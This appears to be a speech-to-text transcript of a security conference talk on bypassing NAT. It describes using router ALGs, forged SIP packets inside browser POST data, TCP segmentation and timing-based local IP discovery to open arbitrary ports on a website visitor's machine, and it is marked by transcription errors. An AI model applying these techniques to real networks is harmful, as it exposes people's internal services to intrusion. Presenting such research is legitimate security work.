 All right everyone, it is my honor to introduce Sammy who is a longtime friend of Torcon who will be speaking about Bypassing that without further ado, Sammy I hope I hope I'll start I hope you'll forgive me. I'm a little under the weather But I am excited to be here and a lot of great stuff to share with you guys We're gonna talk about Nat painting and I realize I have a lot of information here So we'll zoom through a little happy to do Q&A after but first let's talk about what is net network address translation Most of us have routers at home. I mean most of our networks at home probably looks kind of like this where you basically have The idea of that is that we're essentially running out of IPv4 space and IPv6 is coming. So that's what they tell us Any time now any day now and the idea of that is that because we're running out of IPv4 space or public IPs What we can do is we can essentially have our router here and that can give us internal address space So a 10-dot network or one-on-two network that is not actually routable on the public internet However, we can have multiple devices all sharing a public IP address that then reaches the internet and the idea of Nat pinning actually one of the benefits of routers is that they essentially act as a firewall so They will essentially if you have a bunch of services running on your machine and someone tries to say connect to your Machine from outside from the public internet They can't because your router is blocking it because your router needs to know who is this supposed to go to unless you have port forwarding or DMZ Or some some sort of feature enabled now. Why is this a big deal? I ran LSOF on my machine a couple days ago, and this is what came up All these services are listening on essentially public on my public network device So that means I don't know I have node servers running. I don't know why node is running. I don't know why node is running Crash plan is my backup service Sonos I don't even have a sonos yet. Sonos is listening on my computer and is listening to like has an open service Why is that pot? Why is that happening? So many of these many of these tools are gonna have vulnerabilities in them So it's always interesting to see if we can attack those Those services so the idea of Nat pinning is something I demonstrated maybe nine or ten years ago And that was a very basic proof of concept or essentially a Victim would go and visit a website on the internet malicious website And that website would send some data through back to the back to the user The user would execute some code on their web browser and then open up Essentially port on their router Now the way that essentially happened is through something called connection tracking now connection tracking is something We may have seen with ftp ftp is a good example Many of you have used ftp. Hopefully no one uses it anymore ftp allows you to transfer files so you can ftp to ftp server and you'll say hey I want to receive this file But the way that happens is that actually uses a second port what your ftp client does is it opens a secondary port and Your f and the ftp server will connect to that port the problem is when routers came out that broke Because now your router says I don't know what this port one two three four is so why would I connect to this? So routers then introduce something called connection tracking or an application level gateway an absolute ALG will say Oh, I'm a router I see someone internally on my internal network wants to do an ftp and they said oh connect back on port one two three So I will open port one two three for them So initially and when I'm looking into how a protocol works The first thing I do is read the RFC now RFCs are essentially how protocols are built But it doesn't necessarily mean protocols are built this way But it's a good foundation to base things off of In 2010 when I was initially demonstrating how this how this technique worked Essentially, I tried ftp. I was trying I found that the browsers had various restricted ports so I actually couldn't connect to ftp and IRC was another tool that I wanted to use Let's see here. Excuse me Oh, so What I wanted to do was essentially act as an IRC client But the nice thing about IRC is that it's similar to HTTP and that it's a new line-based protocol When you're on HTTP and you reach a web server, you say I want to get slash HP 1.0 You know carriage return new line all of these are new line-based and IRC is also another new line-based protocol Just like ftp and IRC has something similar to al to ftp where you can say hey, I'm going to DCC chat You I'm going to DCC send you a file and you're going to connect back to me on this port and your router again Has an ALG for IRC DCC So your router sees that message and is going to open up the port and then port forward back to you if you're using an IRC client To send this DCC message So I was thinking couldn't I just create a web form that connects to an IRC server But it's really a is just a random server on the internet on the IRC port 6667 And then we say I want to send a DCC because you can force someone's web browser to submit a form And you can make him do that to any port except for the fact that browsers restrict ports an interesting way around that is In 2010 what you could do is you can essentially have TCP ports and UDP ports are 16 bits wide 65,535 possibility 36 possibilities However, the browser itself is dealing with strings. So if you added one bit Let's say you created a 17-bit port and essentially the highest bit was a one You have a port that's much larger than six that's much that's larger than six 16 bits However What would happen is your browser would say is this a restricted port? No I don't know this port whatever port number. It is in this case. It is I Don't think I have it written down here, but 65 Let's say I want to connect to port 6667 if you had 65536 plus 6667 you have some much bigger number And your browser will then see that and say oh that's not in my restricted port list Then it will send it on to the TCP IP stack Which only is going to take a 16 bit did 16 bit number and you just bypass the restriction the port restriction So you can now connect out to any restricted port on the user's browser and this is essentially what the what an IRC Connection would typically look like so what your browser is actually sending is we take all of this data and this message And like a DCC message and put it in the post body and it will post something and your and ultimately Your router will see that and then open a port back And I'll be happy to share the slides This is the example code that actually performs this full attack and would actually do this and would open up essentially any arbitrary TCP port Now one thing is when I tried this it actually didn't work and part of the reason is that the way for this to work is that DCC and FTP they both require you to know the internal IP address so when you're saying hey connect back to me you're also including that your IP address your local IP address and Typically a browser doesn't know your local IP address Now in 2010 there was a technology called live connect has anyone used live connect. I'm glad to hear that I'm glad to see this was Java Embedded into the browser Accessible via JavaScript and you could do some really wacky things It was really useful for me because it allowed me to access your internal IP. It went away very quickly So this was the live connect code that would essentially allow you to access your local IP address So it was built into a couple of browsers briefly as a beta and then quickly went away Here's the actual full code of Performing this attack back in 2010 now they fixed the rest port restriction. They've removed live connect so none of the stuff works today and This has always been kind of interesting to me. So I've tried to just play with this over over time Our overflow technique also no longer works. So recently I've been looking at what are other services that? that are Multi-protocol right something that an ALG would actually look at and I made a spreadsheet here I went through the Linux Linux TC of TCP IP stack and just Collected all the different ports and services and what protocol they need to be on and I wanted to find and then I took a List of chrome restricted ports We see what chrome blocks and the ones that they don't block are saying which is a backup protocol that nobody uses SIP Pptp h3 2 3 which is voice over IP and sip was pretty interesting So I started taking a look at sip if you're not familiar with sip. It's like It's like FTP but for noise. It's a voice over IP protocol So it says you can make a connection on UDP or TCP port 5060 to some server and you say hey I want to make a call on a invite and then you can and then on a secondary channel You'll then send audio and you can create additional channels for a video So I was thinking okay, couldn't I reproduce that same technique the snap pending technique with sip because this also supports TCP 5060 is not blocked based off the the chrome restriction list. So that's pretty cool Maybe we can do that. So I attempted to do this via the HB post I made a website it has a hidden form it auto submits via JavaScript to a server that I'm running on port 5060 with the sip with the sip packet in the TCP in the port post section Unfortunately this failed because again, I don't know the IP address. So we actually need to know what the IP is So I found a pretty cool thing that would allow me to grab your local IP address and that was stun essentially now new browsers have web RTC which allow you to perform voice over IP with other people on the internet and partially You need to actually know the local IP address So I was very excited when I found that you can actually use stun and ice to get the users local IP address This was really cool Unfortunately a couple weeks ago when I was working on this presentation for you guys It stopped working and that's because people realize it's bad idea to actually show the local IP address So all the browsers stopped doing this and then instead they replace it instead It's no longer a local IP address, but rather it's a bonjour or mdns Hostname that doesn't resolve except internally on your network. So this all broke Thank you Just kidding So this is an example of what it would actually look like. This was what it ended up being so I Furiously had to find a alternate solution Since this no longer work because you can't use that dot local IP address because when your ALG sees that your router sees it It's not it's gonna say I don't know what that is And then here's here's a video where we'll see We're gonna do TCP up from my laptop and then we're gonna go from a server I'm behind a router in there, and then we'll just see. Oh, we'll do net cat. That's what we're doing Okay, and we'll see something interesting here when you connect to a service that isn't running We see an immediately connection refused and that's because TCP is sending an RST back to us because there's an IP stack That's living and when there's when we connect to a service that is there like port 80 Then we get a snack back saying hey, I'm here and I want to connect with you Now if you connect to an IP address that does not exist we get nothing back So can we use this information to help us gain an IP address? so What we can actually do is a tcp timing attack within the web browser What if you create an image and your image connects to? Random IP let's say a router IP like 192.168.0.1 now You don't know the victim's router IP, but we do know there's probably a handful maybe 20 IPs that are pretty common within routers as their gateway IP and what if we do We create an image and then we have an odd mode and an on error event Now if there is a machine there It's either going to be listening on say port 80 or it's not gonna be listening if it's listening and it's on port 80 And the image exists We're that's gonna fire an on success event if it's not listening, but that's gonna fire an rst Which will fire an on error event if there's nothing there an on error will happen, but it'll happen after a few seconds So what if we just time that amount of time from when we drop this image to when we get an on success or on error? And we don't care if there's something listening or not We just want to know is there a machine there and we do this for say the top 50 possible routers And now we know what the gateway IP address of your land is so now we've just discovered By trying one and two one six eight zero dot one dot one dot one dot two dot one so so on and so forth We tried all the ten ten dots and then we figure out what your gateway IP address is now We still don't know your IP we need to know that so then we perform the same attack But for your subnet and we're doing this now for every IP within your subnet and timing all of them Well, which machine is going to respond the fastest it's your own machine, right? Because your bones your own machine doesn't need to respond doesn't need to go through the router So it's going to immediately respond and you can now determine a local IP address So this is an example. This is entirely automated where you visit a site. It detects what subnet you are by testing It's actually I probably test 300 different 300 different routers and Then whichever one is fastest then we try all the IPs in that subnet and then ultimately we we see that we do get the Local IP address so that is pretty cool. We now know the local IP address of The user Unfortunately, I then tried that I took the local IP address. I put it in the zip packet and then Still in work. So why does it fail? So I think we need to really understand how does a router ALG work? So the first thing we want to do is we want to dump firmware if we want to really understand right you take your router You open it up and you potentially dump firmware Just some of the tools that I like to use That's strange This is the wrong image Sorry about that That's better. That's better. Okay So I like to actually use my phone whenever I'm investigating hardware, right? If I'm looking at hardware a I like to take pictures with it Right, I can take big pictures. You can zoom in You can use the flashlight to often look through a PCB to follow traces It's very useful if you put it on the bottom of a circuit board That will help you find things You should be looking at the names of all the chips on here So if you open up your router, you can look at all the chips look at the names find the data sheets Many almost all of these will have well many of these will have public data sheets If I'm trying to dump firmware or attack a chip some other way micro probes are super useful Logic analyzers super useful if you're glitching tools like chip whisper from Colin O'Flynn super useful And then also going online looking for binaries If you can find binaries or you can extract from or you extract it from the device itself Then using a tool like binwalk, which will actually find different It will look for different binaries and file types within a larger image So it'll say oh you have an LZMA or you have a squash FS file system here And then once you know that you can use binwalk dash E or you can use a separate tool like I'm squash FS to extract That and then access the files inside Once you have access to the files inside then you want to kind of look around so Excuse me So I was looking around to see all right. I know my router is fdp and sip So let me just look around the file system and see what does it do with fdp? And what does it do with sip because my sip the technique that I think should work I know voice over IP calls works So my router clearly has ALG enabled yet when I attempt my attack from the browser it no longer works So what's going on here? So I did a unsquash FS pulled out the file system went through look for different fdp files I have a bunch of different tools. I'm using I've also linked to all of them in the bottom right here So I can make this this tool of this spread this presentation available. Excuse me And I also wanted to start using this tool cut jidra. Geedra. Let me know how it's pronounced Geedra Geedra, how do you know? Do you work? No, are you with the NSA somebody else I'm ready told you Hmm, and I love that when jidra This tool when this tool came out the NSA release this reverse engineering tool And it was around the same week that Microsoft saw this was like oh, we're gonna open source calculator in response So calculator came out as open source as well, which is pretty cool So with jidra jidra, am I pronouncing it right? I apologize Geedra, okay, my head is like it's not great right now. I Apologize so in Geedra We're taking a look at one of the files that match fdp just the word fdp That was a it was a kernel object to dock KO So I was like oh, there's gonna be some cool stuff in there and we start taking a look and then I'm like, okay We what other decodes are there? What other ALG is does this router support and of course we found sip decode? So now we're looking around for a sip decode to see how does sip decode work under what conditions will my router say? Oh, this is a sip packet verse. This is someone just doing whatever random other traffic and Interestingly, we see something here where it's doing an invite in my sip example I was doing an invite or a register And here it's actually doing a string string and Kate and case compare And what's interesting about this is that the invite or the register must be at the beginning of the data portion of the packet So now in a TCP packet if you're sending if you're doing this weird thing through HTTP post Your packet is actually going to begin with a post slash HB 1.0 host whatever host user agent whatever and then the post data So unfortunately, I can't control the beginning of the packet That's the browser the browser has full control of the beginning of the packet I only have control of the middle of the packet, which is the post data So I'm thinking okay, what else can we do? How can I look how can I maybe perform some sort of raw socket within the web browser? So I started taking look at Chrome flags and experiments It's always interesting to see what are the new protocols that are supported going through that stuff What features does it have? and Looking at sockets here's the Chrome source code going through here I was going through the W3 website and then I found this page We're not trying to like understand a protocol and it's like what is topic explanation? What is topic used for explanation? There's not much explanation there But most of their documentation actually is really good after going through I found some protocols that my browser supports Which is HP, HPS, FTP, WebSocket, DNS Spidey, STUN, ICE, a couple others nothing that really allowed me to control the very beginning of the packet Which is what I need to potentially perform this attack But then I was looking at UDP STUN and I was playing around with that because the STUN, TURN, and ICE Those are all used to Understand what kind of NAT you're using so that WebRTC can then properly perform voice or IP and video video communication And I started playing with the with STUN and I found that I can actually set a username For a packet For to authorize that STUN connection and that username can actually be as long as I want So you can kind of do you can just send really really really long packets in UDP Now what's interesting about this is that ultimately you have a limit of how long a packet is but the browser itself didn't limit it So that means it's your IP stack now limiting it when your IP stack limits it in this scenario for UDP Then does IP fragmentation so once you're over the boundary of the first packet It then creates a secondary packet where you now control the beginning of that packet So you actually as long as you know what the size of that packet is which you can do in a test case You can now do essentially arbitrary UDP packet injection on the second packet That's pretty cool The only problem with ALG is that for ALG when it sees a SIP UDP packet It will only allow you to then open a UDP port and UDP ports are fun, but I'm really more interested in TCP ports That's where all the juicy services are running So we now actually have the ability to do UDP packet injection and this This technique work for UDP, but the problem is I need to do this for TCP So what if we just sent a really really really long form? This is an actual post from my from my Chrome web browser So I just sent a post I bolded the parts that I control right so I control this The the flash whatever the URL I control the cookie and then I control the form The form data itself, so I just sent a ton of data and I somehow photoshopped a weird thing there I don't know why and then I sent my SIP packet in this case. It's a register packet and what's really interesting is that You can do perform the same exact attack So what you do is you create a really really long packet and you are listening on the other side on port 5060 on TCP now And on TCP you get this packet and then you see where does it break up? And you can actually kind of control where it breaks up because TCP has a feature called MTU sizes We I'm sorry. That's ethernet ethernet has MTU sizes. You want to you want a smaller MTU, but TCP has a Man what MSS? Yeah, was it message segment size segmentation? Maximum segment size. Thank you So you get when you're actually receiving a TCP sin from someone you can then respond with an MSS in the options and say I will only accept packets of this size and then you already know the size of the packets that the Browser is going to send I did find that some browsers specifically Firefox and one other one would Alter the width of this webkit form boundary, which is the boundary of the post data for for this specific form It would only do it by a few bytes So I found that Intermittently this would not work you would not know the proper size and what you can do is all you do is you listen on the other Size on the other side and you say oh that was off by one bite Send that data back to the browser over a web socket tell them hey You were one bite off try again, and you do this feedback loop and within five tries you then have Use then send this post this extra data and you create a new TCP packet essentially with full arbitrary TCP control of the data portion Ultimately, this allowed me to Reperform the same exact attack and you now have entire arbitrary TCP and you need to be packet injection control within your Browser which real of the attack which also means you can then open up any TCP or UDP port on that victim Just by them visiting a website you can then connect back to any service that they're running Which is pretty cool, and I think that's it I think it's an example of like connecting to a mySQL server. That's on my computer. So it's an entirely automated I'd be happy to share any details or answer any other any questions Yeah, cool we have minute and 50 seconds any questions Yes, oh That's really interesting. I don't think it would work on a VPN provider because Hey, I don't think I'm even gonna get their IP address. I don't know me I'm not sure That's a good question anyone know Yeah, I Don't know if they're doing ALG. I wonder if they are I'm not sure. Yeah, that'd be interesting to see Yes I Think that's what's interesting to me is that I don't think it's about right This is just right in all you're doing is you're abusing multiple protocols, right? You're telling your browsers to behave like a sip client and your router sees a sip What appears to be a sip client talking on the sip port with a valid sip packet? Everything looks correct. So I don't I don't consider this a bug, right? I consider this just an abuse of multiple protocols So No one's at fault Yes You can do it multiple ways. I mean on the ALG like Browsers are probably just gonna keep on closing ports. I don't think that's a that's the correct It's the real solution. I don't necessarily think it's the browser's issue either I don't know. You could have a more strict ALG on your router that says, oh, I shouldn't like I Don't know man That's tough because you don't you don't want to drop an ALG just because someone sent an invalid packet because if if there's an update to a protocol and Your router didn't get that didn't get that update and now you see an incorrect Packet like I don't think you should drop all ALG support. So I honestly don't know the answer. I haven't really thought about it Yeah, okay. Thank you so much everyone If anyone has any further questions, Sammy will be outside in the patio and Last reminder if you are doing skydiving tomorrow to go to registration basically right now and sign up for that